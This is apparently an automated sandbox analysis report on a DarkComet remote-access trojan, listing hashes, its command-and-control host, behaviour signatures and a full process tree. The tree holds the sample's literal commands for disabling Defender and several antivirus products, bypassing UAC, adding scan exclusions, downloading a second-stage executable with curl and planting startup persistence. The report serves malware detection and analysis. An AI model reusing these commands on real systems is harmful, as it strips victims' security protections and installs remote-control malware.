Analysis
- max time kernel: 150s
- max time network: 126s
- platform: windows10-2004_x64
- resource: win10v2004-20230221-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20230221-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 15-03-2023 11:34
- Static task: static1
- Behavioral task: behavioral1
- Sample: 6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe
- Resource: win7-20230220-en
General
- Target: 6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe
- Size: 142KB
- MD5: 824247ace17fdb122110cf96aba85484
- SHA1: 8b6a758d3fef912321d127c3a9da0a77af8e574e
- SHA256: e9fb20dda9f6e356a21dc67a63ab4df04c2a38af8e0fc2acb7d9e01bd6864749
- SHA512: 5d1862e383e1ff21f639842dd22126480a993a31060e50e5a102a41ecdc41077f179aec105abd084354112519cd34c89676164f43114b8c589ffd66ce918c715
- SSDEEP: 3072:d7DhdC6kzWypvaQ0FxyNTBfNU/JMQNX1j8KCOdW6m1cTxotQX:dBlkZvaF4NTB1U/JM8XaOdW6miTEQX
Malware Config
Extracted
- Family: darkcomet
- Botnet: Microsoft
- C2: mafafa9090-59805.portmap.io:59805
- Mutex: DC_MUTEX-SYYFNJW
Attributes
- InstallPath: Microsoft.exe
- gencode: PCo28LJinyik
- install: true
- offline_keylogger: false
- persistence: true
- reg_key: Microsoft
Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes: program.exe
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\system32\\Microsoft.exe" | program.exe

Modifies Windows Defender Real-time Protection settings
Processes: reg.exe, reg.exe, reg.exe, reg.exe, reg.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | reg.exe

UAC bypass
Processes: reg.exe
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | reg.exe

Windows security bypass
Processes: reg.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp = "0" | reg.exe
Disables RegEdit via registry modification 1 IoCs
Processes: Microsoft.exe
description | ioc | process
Set value (int) | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | Microsoft.exe

Disables Task Manager via registry modification

Downloads MZ/PE file

Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
Processes: attrib.exe, attrib.exe
pid | process
360 | attrib.exe
3904 | attrib.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes: program.exe
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation | program.exe

Drops startup file 4 IoCs
Processes: powershell.exe, cmd.exe, attrib.exe
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\program.lnk | powershell.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe | cmd.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe | cmd.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe | attrib.exe

Executes dropped EXE 2 IoCs
Processes: program.exe, Microsoft.exe
pid | process
3736 | program.exe
2116 | Microsoft.exe

Adds Run key to start application 2 TTPs 2 IoCs
Processes: program.exe, Microsoft.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Windows\\system32\\Microsoft.exe" | program.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Windows\\system32\\Microsoft.exe" | Microsoft.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Drops file in System32 directory 3 IoCs
Processes: program.exe
description | ioc | process
File created | C:\Windows\SysWOW64\Microsoft.exe | program.exe
File opened for modification | C:\Windows\SysWOW64\Microsoft.exe | program.exe
File opened for modification | C:\Windows\SysWOW64\ | program.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Modifies registry class 1 IoCs
Processes: program.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | program.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes: powershell.exe, powershell.exe, powershell.exe
pid | process
3256 | powershell.exe
3256 | powershell.exe
636 | powershell.exe
636 | powershell.exe
4248 | powershell.exe
4248 | powershell.exe

Suspicious use of AdjustPrivilegeToken 51 IoCs
Processes: powershell.exe, powershell.exe, powershell.exe, program.exe, Microsoft.exe
description | pid | process
Token: SeDebugPrivilege | 3256 | powershell.exe
Token: SeDebugPrivilege | 636 | powershell.exe
Token: SeDebugPrivilege | 4248 | powershell.exe
Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, 33, 34, 35, 36 (one IoC per token, 24 IoCs) | 3736 | program.exe
Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, 33, 34, 35, 36 (one IoC per token, 24 IoCs) | 2116 | Microsoft.exe

Suspicious use of WriteProcessMemory 64 IoCs
Processes: 6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe, cmd.exe, net.exe
description | pid | process | target process (each row below is recorded twice in the report, giving 64 IoCs)
PID 2060 wrote to memory of 1616 | 2060 | 6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe | cmd.exe
PID 1616 wrote to memory of 1060 | 1616 | cmd.exe | net.exe
PID 1060 wrote to memory of 1376 | 1060 | net.exe | net1.exe
PID 1616 wrote to memory of 2372 | 1616 | cmd.exe | reg.exe
PID 1616 wrote to memory of 2880 | 1616 | cmd.exe | reg.exe
PID 1616 wrote to memory of 4132 | 1616 | cmd.exe | reg.exe
PID 1616 wrote to memory of 3696 | 1616 | cmd.exe | reg.exe
PID 1616 wrote to memory of 4456 | 1616 | cmd.exe | reg.exe
PID 1616 wrote to memory of 4576 | 1616 | cmd.exe | reg.exe
PID 1616 wrote to memory of 244 | 1616 | cmd.exe | reg.exe
PID 1616 wrote to memory of 236 | 1616 | cmd.exe | reg.exe
PID 1616 wrote to memory of 116 | 1616 | cmd.exe | reg.exe
PID 1616 wrote to memory of 4948 | 1616 | cmd.exe | reg.exe
PID 1616 wrote to memory of 1996 | 1616 | cmd.exe | reg.exe
PID 1616 wrote to memory of 792 | 1616 | cmd.exe | reg.exe
PID 1616 wrote to memory of 1956 | 1616 | cmd.exe | reg.exe
PID 1616 wrote to memory of 4752 | 1616 | cmd.exe | reg.exe
PID 1616 wrote to memory of 2172 | 1616 | cmd.exe | reg.exe
PID 1616 wrote to memory of 444 | 1616 | cmd.exe | reg.exe
PID 1616 wrote to memory of 3888 | 1616 | cmd.exe | reg.exe
PID 1616 wrote to memory of 4152 | 1616 | cmd.exe | reg.exe
PID 1616 wrote to memory of 2108 | 1616 | cmd.exe | reg.exe
PID 1616 wrote to memory of 3256 | 1616 | cmd.exe | powershell.exe
PID 1616 wrote to memory of 3508 | 1616 | cmd.exe | reg.exe
PID 1616 wrote to memory of 696 | 1616 | cmd.exe | reg.exe
PID 1616 wrote to memory of 1916 | 1616 | cmd.exe | reg.exe
PID 1616 wrote to memory of 328 | 1616 | cmd.exe | reg.exe
PID 1616 wrote to memory of 636 | 1616 | cmd.exe | powershell.exe
PID 1616 wrote to memory of 4528 | 1616 | cmd.exe | reg.exe
PID 1616 wrote to memory of 4796 | 1616 | cmd.exe | reg.exe
PID 1616 wrote to memory of 5080 | 1616 | cmd.exe | reg.exe
PID 1616 wrote to memory of 4864 | 1616 | cmd.exe | reg.exe

Views/modifies file attributes 1 TTPs 3 IoCs
Processes: attrib.exe, attrib.exe, attrib.exe
pid | process
360 | attrib.exe
3904 | attrib.exe
4632 | attrib.exe
Processes (the leading number is the depth in the process tree; indentation shows parent/child)

1 C:\Users\Admin\AppData\Local\Temp\6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe
  Command: "C:\Users\Admin\AppData\Local\Temp\6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe"
  - Suspicious use of WriteProcessMemory
  2 C:\Windows\system32\cmd.exe
    Command: "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8254.tmp\8265.tmp\8266.bat C:\Users\Admin\AppData\Local\Temp\6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe"
    - Drops startup file
    - Suspicious use of WriteProcessMemory
    3 C:\Windows\system32\net.exe
      Command: net session
      - Suspicious use of WriteProcessMemory
      4 C:\Windows\system32\net1.exe
        Command: C:\Windows\system32\net1 session
    3 C:\Windows\system32\reg.exe
      Command: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3 C:\Windows\system32\reg.exe
      Command: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
      - Modifies Windows Defender Real-time Protection settings
    3 C:\Windows\system32\reg.exe
      Command: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
    3 C:\Windows\system32\reg.exe
      Command: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
      - Modifies Windows Defender Real-time Protection settings
    3 C:\Windows\system32\reg.exe
      Command: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
      - Modifies Windows Defender Real-time Protection settings
    3 C:\Windows\system32\reg.exe
      Command: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d 1 /f
      - Modifies Windows Defender Real-time Protection settings
    3 C:\Windows\system32\reg.exe
      Command: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
      - Modifies Windows Defender Real-time Protection settings
    3 C:\Windows\system32\reg.exe
      Command: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d 0 /f
    3 C:\Windows\system32\reg.exe
      Command: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
    3 C:\Windows\system32\reg.exe
      Command: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\AVAST Software\Avast" /v DisableAntiVirus /t REG_DWORD /d 1 /f
    3 C:\Windows\system32\reg.exe
      Command: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\McAfee\Endpoint\AV" /v EnableOnAccessScan /t REG_DWORD /d 0 /f
    3 C:\Windows\system32\reg.exe
      Command: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Symantec\Symantec Endpoint Protection\SMC" /v smc_enable /t REG_DWORD /d 0 /f
    3 C:\Windows\system32\reg.exe
      Command: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\TrendMicro\PC-cillinNTCorp\CurrentVersion\Misc." /v AllowUnloading /t REG_DWORD /d 1 /f
    3 C:\Windows\system32\reg.exe
      Command: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\SafeDog" /v Enable /t REG_DWORD /d 0 /f
    3 C:\Windows\system32\reg.exe
      Command: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\KasperskyLab\protected\AVP13\settings" /v Enable /t REG_DWORD /d 0 /f
    3 C:\Windows\system32\reg.exe
      Command: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\SecureMac" /v GlobalSwitch /t REG_DWORD /d 0 /f
    3 C:\Windows\system32\reg.exe
      Command: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\Symantec Endpoint Protection\AV" /v EnableAutoProtect /t REG_DWORD /d 0 /f
    3 C:\Windows\system32\reg.exe
      Command: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d 5 /f
    3 C:\Windows\system32\reg.exe
      Command: REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\FeatureManagement\Overrides\0\2093230218" /v EnabledState /t REG_DWORD /d 0 /f
    3 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command: powershell -command "Set-MpPreference -DisableTamperProtection $true"
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    3 C:\Windows\system32\reg.exe
      Command: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Features" /v TamperProtection /t REG_DWORD /d 0 /f
    3 C:\Windows\system32\reg.exe
      Command: REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v Start /t REG_DWORD /d 4 /f
    3 C:\Windows\system32\reg.exe
      Command: REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "4" /f
    3 C:\Windows\system32\reg.exe
      Command: REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t REG_DWORD /d "2" /f
    3 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command: powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    3 C:\Windows\system32\reg.exe
      Command: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v FilterAdministratorToken /t REG_DWORD /d 1 /f
    3 C:\Windows\system32\reg.exe
      Command: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
      - UAC bypass
    3 C:\Windows\system32\reg.exe
      Command: REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v ""C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"" /t REG_DWORD /d "0" /f
    3 C:\Windows\system32\reg.exe
      Command: REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v ""C:\Users\Admin\AppData\Local\Temp"" /t REG_DWORD /d "0" /f
      - Windows security bypass
    3 C:\Windows\system32\curl.exe
      Command: curl -L https://raw.githubusercontent.com/maxavison7/nothing/main/Microsoft.exe --output "C:\Users\Admin\AppData\Local\Temp\program.exe"
    3 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command: powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut(\""C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\program.lnk"\"); $s.TargetPath = \""C:\Users\Admin\AppData\Local\Temp\program.exe"\"; $s.WorkingDirectory = \""C:\Users\Admin\AppData\Local\Temp"\"; $s.IconLocation = \""C:\Users\Admin\AppData\Local\Temp\program.exe"\"; $s.Save()"
      - Drops startup file
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    3 C:\Windows\system32\attrib.exe
      Command: attrib +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe"
      - Drops startup file
      - Views/modifies file attributes
    3 C:\Users\Admin\AppData\Local\Temp\program.exe
      Command: "C:\Users\Admin\AppData\Local\Temp\program.exe"
      - Modifies WinLogon for persistence
      - Checks computer location settings
      - Executes dropped EXE
      - Adds Run key to start application
      - Drops file in System32 directory
      - Modifies registry class
      - Suspicious use of AdjustPrivilegeToken
      4 C:\Windows\SysWOW64\cmd.exe
        Command: "C:\Windows\System32\cmd.exe" /k attrib "C:\Users\Admin\AppData\Local\Temp\program.exe" +s +h
        5 C:\Windows\SysWOW64\attrib.exe
          Command: attrib "C:\Users\Admin\AppData\Local\Temp\program.exe" +s +h
          - Sets file to hidden
          - Views/modifies file attributes
      4 C:\Windows\SysWOW64\cmd.exe
        Command: "C:\Windows\System32\cmd.exe" /k attrib "C:\Users\Admin\AppData\Local\Temp" +s +h
        5 C:\Windows\SysWOW64\attrib.exe
          Command: attrib "C:\Users\Admin\AppData\Local\Temp" +s +h
          - Sets file to hidden
          - Views/modifies file attributes
      4 C:\Windows\SysWOW64\Microsoft.exe
        Command: "C:\Windows\system32\Microsoft.exe"
        - Disables RegEdit via registry modification
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious use of AdjustPrivilegeToken
        5 C:\Windows\SysWOW64\notepad.exe
          Command: notepad
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 2KB
  MD5: d85ba6ff808d9e5444a4b369f5bc2730
  SHA1: 31aa9d96590fff6981b315e0b391b575e4c0804a
  SHA256: 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
  SHA512: 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 2e907f77659a6601fcc408274894da2e
  SHA1: 9f5b72abef1cd7145bf37547cdb1b9254b4efe9d
  SHA256: 385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233
  SHA512: 34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: c08aea9c78561a5f00398a723fdf2925
  SHA1: 2c880cbb5d02169a86bb9517ce2a0184cb177c6e
  SHA256: 63d2688b92da4d1bb69980b7998b9be1595dd9e53951434a9414d019c4f825a7
  SHA512: d30db2f55bbda7102ffe90520d233355633313dcc77cdb69a26fdbb56e59dd41793def23d69dc5dc3f94c5bd41d3c26b3628886fd2edbed2df0b332e9a21f95c

- C:\Users\Admin\AppData\Local\Temp\8254.tmp\8265.tmp\8266.bat
  Filesize: 48KB
  MD5: a441547bf9949c2903a3eea35ee4da65
  SHA1: 97eda2f9d21b8e9f44d0695d73d70a406c976b99
  SHA256: 15c7f95ef37f78ce24d32fd5bc473e8bbec4e25fe10ebf5aab9c94155326b82d
  SHA512: 9dabae688c3a46f192363cc1bdebf53ad62fc79b966e3d32a38fc2bf02e0a6f9d2aab23a8c8d9ce00ba1b1ae22b331838032a16f8a8a5b784ef4b6a701d28a3a

- C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5trvpclw.d2y.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

- C:\Users\Admin\AppData\Local\Temp\program.exe
  Filesize: 780KB
  MD5: aceeb574066c69e3ef181dacc559e418
  SHA1: 1c8f6c838951c4b344e69db7cba27ab04cc48235
  SHA256: fc9c423da251f7fb08f426f5d153fae73532cc1a3c349a040526b6bedd632c9e
  SHA512: 0c6b8bd5e038292e064f47f35882adf43a8317ee05d052cf251c62d6dfce14f15fb240530946120b370b6fce53a7e8e3d716d32d53c9eee016b2ac2efca2eb97

- C:\Users\Admin\AppData\Local\Temp\program.exe
  Filesize: 780KB
  MD5: aceeb574066c69e3ef181dacc559e418
  SHA1: 1c8f6c838951c4b344e69db7cba27ab04cc48235
  SHA256: fc9c423da251f7fb08f426f5d153fae73532cc1a3c349a040526b6bedd632c9e
  SHA512: 0c6b8bd5e038292e064f47f35882adf43a8317ee05d052cf251c62d6dfce14f15fb240530946120b370b6fce53a7e8e3d716d32d53c9eee016b2ac2efca2eb97

- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe
  Filesize: 142KB
  MD5: 824247ace17fdb122110cf96aba85484
  SHA1: 8b6a758d3fef912321d127c3a9da0a77af8e574e
  SHA256: e9fb20dda9f6e356a21dc67a63ab4df04c2a38af8e0fc2acb7d9e01bd6864749
  SHA512: 5d1862e383e1ff21f639842dd22126480a993a31060e50e5a102a41ecdc41077f179aec105abd084354112519cd34c89676164f43114b8c589ffd66ce918c715

- C:\Windows\SysWOW64\Microsoft.exe
  Filesize: 780KB
  MD5: aceeb574066c69e3ef181dacc559e418
  SHA1: 1c8f6c838951c4b344e69db7cba27ab04cc48235
  SHA256: fc9c423da251f7fb08f426f5d153fae73532cc1a3c349a040526b6bedd632c9e
  SHA512: 0c6b8bd5e038292e064f47f35882adf43a8317ee05d052cf251c62d6dfce14f15fb240530946120b370b6fce53a7e8e3d716d32d53c9eee016b2ac2efca2eb97

- C:\Windows\SysWOW64\Microsoft.exe
  Filesize: 780KB
  MD5: aceeb574066c69e3ef181dacc559e418
  SHA1: 1c8f6c838951c4b344e69db7cba27ab04cc48235
  SHA256: fc9c423da251f7fb08f426f5d153fae73532cc1a3c349a040526b6bedd632c9e
  SHA512: 0c6b8bd5e038292e064f47f35882adf43a8317ee05d052cf251c62d6dfce14f15fb240530946120b370b6fce53a7e8e3d716d32d53c9eee016b2ac2efca2eb97

- C:\Windows\SysWOW64\Microsoft.exe
  Filesize: 780KB
  MD5: aceeb574066c69e3ef181dacc559e418
  SHA1: 1c8f6c838951c4b344e69db7cba27ab04cc48235
  SHA256: fc9c423da251f7fb08f426f5d153fae73532cc1a3c349a040526b6bedd632c9e
  SHA512: 0c6b8bd5e038292e064f47f35882adf43a8317ee05d052cf251c62d6dfce14f15fb240530946120b370b6fce53a7e8e3d716d32d53c9eee016b2ac2efca2eb97

Memory dumps
- memory/1792-243-0x00000000007B0000-0x00000000007B1000-memory.dmp (Filesize: 4KB)
- memory/2116-244-0x0000000002290000-0x0000000002291000-memory.dmp (Filesize: 4KB)
- memory/2116-246-0x0000000000400000-0x00000000004D0000-memory.dmp (Filesize: 832KB)
- memory/3256-147-0x000002E874730000-0x000002E874740000-memory.dmp (Filesize: 64KB)
- memory/3256-146-0x000002E874730000-0x000002E874740000-memory.dmp (Filesize: 64KB)
- memory/3256-145-0x000002E874730000-0x000002E874740000-memory.dmp (Filesize: 64KB)
- memory/3256-144-0x000002E85B010000-0x000002E85B032000-memory.dmp (Filesize: 136KB)
- memory/3736-184-0x0000000002290000-0x0000000002291000-memory.dmp (Filesize: 4KB)
- memory/3736-245-0x0000000000400000-0x00000000004D0000-memory.dmp (Filesize: 832KB)
- memory/4248-177-0x000002964E6B0000-0x000002964E6C0000-memory.dmp (Filesize: 64KB)
- memory/4248-174-0x000002964E6B0000-0x000002964E6C0000-memory.dmp (Filesize: 64KB)